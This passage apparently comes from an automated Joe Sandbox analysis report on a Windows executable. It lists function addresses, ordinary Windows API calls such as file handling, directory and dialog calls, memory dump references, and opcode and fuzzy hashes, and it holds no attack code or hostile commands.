                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DloadProtectSection
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2203082970-0
                                                                                                                    • Opcode ID: e9f41794013779296979ddb000f9cc6198a95d1d14b674c2d6e779b05047bdc5
                                                                                                                    • Instruction ID: 111728b78e1a57bf6256df248d496613e97eda2b570f63e42d4d8cf67791e45d
                                                                                                                    • Opcode Fuzzy Hash: e9f41794013779296979ddb000f9cc6198a95d1d14b674c2d6e779b05047bdc5
                                                                                                                    • Instruction Fuzzy Hash: 11D0C9B05C06C1ABDE1AEBA8A88B7283F54B374B04FA00505F189D5495DB745884A60E
                                                                                                                    Function 005898BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileType.KERNELBASE(000000FF,005897BE), ref: 005898C8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3081899298-0
                                                                                                                    • Opcode ID: dafa95f2b35bab3682145ebf007dedb8e8fda686de0f05acc0584d99561ee782
                                                                                                                    • Instruction ID: 2322ccadf1565f060457d55907a915fde56491c2611305da7dacaa1376aa58dd
                                                                                                                    • Opcode Fuzzy Hash: dafa95f2b35bab3682145ebf007dedb8e8fda686de0f05acc0584d99561ee782
                                                                                                                    • Instruction Fuzzy Hash: 1FC0023440410695CF61A62498490B57B11BF633697B89794D469950A1C322CC57EF51
                                                                                                                    Function 0059E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E3FC
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: da65b9305f0bbdce4546d1e2bef05689a68743445ea5396aa7e0a44be4dc5d3d
                                                                                                                    • Instruction ID: ba6e9947873197beb7d47f2ae19d278f443c96fd5c6ea48d60c9c1f6ad53488a
                                                                                                                    • Opcode Fuzzy Hash: da65b9305f0bbdce4546d1e2bef05689a68743445ea5396aa7e0a44be4dc5d3d
                                                                                                                    • Instruction Fuzzy Hash: 58B092A1268041BC3648D14A580BD360E48E1C0B10320882AB884C2080E84068050432
                                                                                                                    Function 0059E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E3FC
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: e2e38611840470cf2637a5d87d79e024d144fc6e3f61826b9a39bde0cfbd8dca
                                                                                                                    • Instruction ID: 24f8e1f5c6fc9aa2b13d8bfcc8d15c4f714e24fdf4d7d013ee0598c0d2f36419
                                                                                                                    • Opcode Fuzzy Hash: e2e38611840470cf2637a5d87d79e024d144fc6e3f61826b9a39bde0cfbd8dca
                                                                                                                    • Instruction Fuzzy Hash: CCB012E1268041BC3608D14A5D0FD770F4CF1C0B20330CC2FF584C2080EC402C0A0433
                                                                                                                    Function 0059E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E3FC
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: d9c1ffb858f7c2083918f713b73d081614268a31b2336029b8925d80e578c8d6
                                                                                                                    • Instruction ID: 1a09f91285fe0322fe32669b5b0348a9f05c2a90967366a544966a9a09897e8b
                                                                                                                    • Opcode Fuzzy Hash: d9c1ffb858f7c2083918f713b73d081614268a31b2336029b8925d80e578c8d6
                                                                                                                    • Instruction Fuzzy Hash: D3B092B1268041BC3648D14A580BD360E48E2C0B10320882AF844C2080E8406A010432
                                                                                                                    Function 0059E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E3FC
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 7ad852175d947cc376ed108661cb0ddf6359b47c47c247492eeed7299e112544
                                                                                                                    • Instruction ID: 74d8e8dc97032cf234f479ca5e131eaa2aecde68627cd32144b73d452d62c66f
                                                                                                                    • Opcode Fuzzy Hash: 7ad852175d947cc376ed108661cb0ddf6359b47c47c247492eeed7299e112544
                                                                                                                    • Instruction Fuzzy Hash: 81A011E22A80023C3808A282AC0BC3B0F0CE0C0B203308C2EF820A0080AC8028020832
                                                                                                                    Function 0059E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E3FC
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: ce904f441712b6f87bcb68993862410a25149f8d1b3e2cda3aa33ec146df7ae0
                                                                                                                    • Instruction ID: 7023f0a90dd1c6fe33e6e3f376b83d0a4c7223a5d39ab69fd80809c80bf7269e
                                                                                                                    • Opcode Fuzzy Hash: ce904f441712b6f87bcb68993862410a25149f8d1b3e2cda3aa33ec146df7ae0
                                                                                                                    • Instruction Fuzzy Hash: 27A011E22A8002BC3808A282AC0BC3B0F0CE0C0B203308C2EF80280080AC8028020832
                                                                                                                    Function 0059E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E3FC
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 1006e22e3247b169e0e3c8794fe995742ffbf0ec120c33116abb531edaa847b3
                                                                                                                    • Instruction ID: 7023f0a90dd1c6fe33e6e3f376b83d0a4c7223a5d39ab69fd80809c80bf7269e
                                                                                                                    • Opcode Fuzzy Hash: 1006e22e3247b169e0e3c8794fe995742ffbf0ec120c33116abb531edaa847b3
                                                                                                                    • Instruction Fuzzy Hash: 27A011E22A8002BC3808A282AC0BC3B0F0CE0C0B203308C2EF80280080AC8028020832
                                                                                                                    Function 0059E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E3FC
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 6d5cbbaf91c8dcc2346ef9f7eab69ab8deb8a25eb9fd07b76dec1135d3de4e6b
                                                                                                                    • Instruction ID: 7023f0a90dd1c6fe33e6e3f376b83d0a4c7223a5d39ab69fd80809c80bf7269e
                                                                                                                    • Opcode Fuzzy Hash: 6d5cbbaf91c8dcc2346ef9f7eab69ab8deb8a25eb9fd07b76dec1135d3de4e6b
                                                                                                                    • Instruction Fuzzy Hash: 27A011E22A8002BC3808A282AC0BC3B0F0CE0C0B203308C2EF80280080AC8028020832
                                                                                                                    Function 0059E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E3FC
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 15e74a7eb973d17e90b75b62dfae7e225caad0c3c508269227e2da0262d841ea
                                                                                                                    • Instruction ID: 7023f0a90dd1c6fe33e6e3f376b83d0a4c7223a5d39ab69fd80809c80bf7269e
                                                                                                                    • Opcode Fuzzy Hash: 15e74a7eb973d17e90b75b62dfae7e225caad0c3c508269227e2da0262d841ea
                                                                                                                    • Instruction Fuzzy Hash: 27A011E22A8002BC3808A282AC0BC3B0F0CE0C0B203308C2EF80280080AC8028020832
                                                                                                                    Function 0059E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E3FC
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 83e7604cd26c12a6794af319a1e091c050bf1264b414b55c987584cb29d1109f
                                                                                                                    • Instruction ID: 7023f0a90dd1c6fe33e6e3f376b83d0a4c7223a5d39ab69fd80809c80bf7269e
                                                                                                                    • Opcode Fuzzy Hash: 83e7604cd26c12a6794af319a1e091c050bf1264b414b55c987584cb29d1109f
                                                                                                                    • Instruction Fuzzy Hash: 27A011E22A8002BC3808A282AC0BC3B0F0CE0C0B203308C2EF80280080AC8028020832
                                                                                                                    Function 00589F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetEndOfFile.KERNELBASE(?,0058903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00589F0C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 749574446-0
                                                                                                                    • Opcode ID: eaa58108ead441946266165bd8136251d7981b3ae1b73b353889b671a887eba1
                                                                                                                    • Instruction ID: 4819a5099c0cf1bfee0e8ffa12549cd48f25f9b29d92c422b50518bd08061025
                                                                                                                    • Opcode Fuzzy Hash: eaa58108ead441946266165bd8136251d7981b3ae1b73b353889b671a887eba1
                                                                                                                    • Instruction Fuzzy Hash: B0A0113008000E8ACE802B30CA0800C3B20EB20BC030202A8A00ACA0A2CB22880BAA00
                                                                                                                    Function 0059AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,0059AE72,C:\Users\user\Desktop,00000000,005C946A,00000006), ref: 0059AC08
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1611563598-0
                                                                                                                    • Opcode ID: c9403c4bea63db6f5375afbfbe0bc6a8941582e20201d5fdbfccde6f2d1397f5
                                                                                                                    • Instruction ID: 98670061eb30dfbffaca46fbddea9ba8a3b2418af5e876cf3c4d76c71537f357
                                                                                                                    • Opcode Fuzzy Hash: c9403c4bea63db6f5375afbfbe0bc6a8941582e20201d5fdbfccde6f2d1397f5
                                                                                                                    • Instruction Fuzzy Hash: 84A01130200200AB83000B328F0AA0EBAAAAFA2B00F00C028A00080030CB30C820FA00
                                                                                                                    Function 00589620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,005895D6,?,?,?,?,?,005B2641,000000FF), ref: 0058963B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2962429428-0
                                                                                                                    • Opcode ID: 9b0b1a905dcc393c613aa685c3c733c33d2a07a5aa1d0778bf4dccc45a106356
                                                                                                                    • Instruction ID: ba124ada0b067e8c83143f0df8159b4d0ab9b1d106eccb21cd524a3a8955a87a
                                                                                                                    • Opcode Fuzzy Hash: 9b0b1a905dcc393c613aa685c3c733c33d2a07a5aa1d0778bf4dccc45a106356
                                                                                                                    • Instruction Fuzzy Hash: CDF0E970481B459FDB31AA21C44CBA27BE87B12321F080B1ED8E3629E0E370658D8B40

                                                                                                                    Non-executed Functions

                                                                                                                    Function 0059C220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00581316: GetDlgItem.USER32(00000000,00003021), ref: 0058135A
                                                                                                                      • Part of subcall function 00581316: SetWindowTextW.USER32(00000000,005B35F4), ref: 00581370
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0059C2B1
                                                                                                                    • EndDialog.USER32(?,00000006), ref: 0059C2C4
                                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0059C2E0
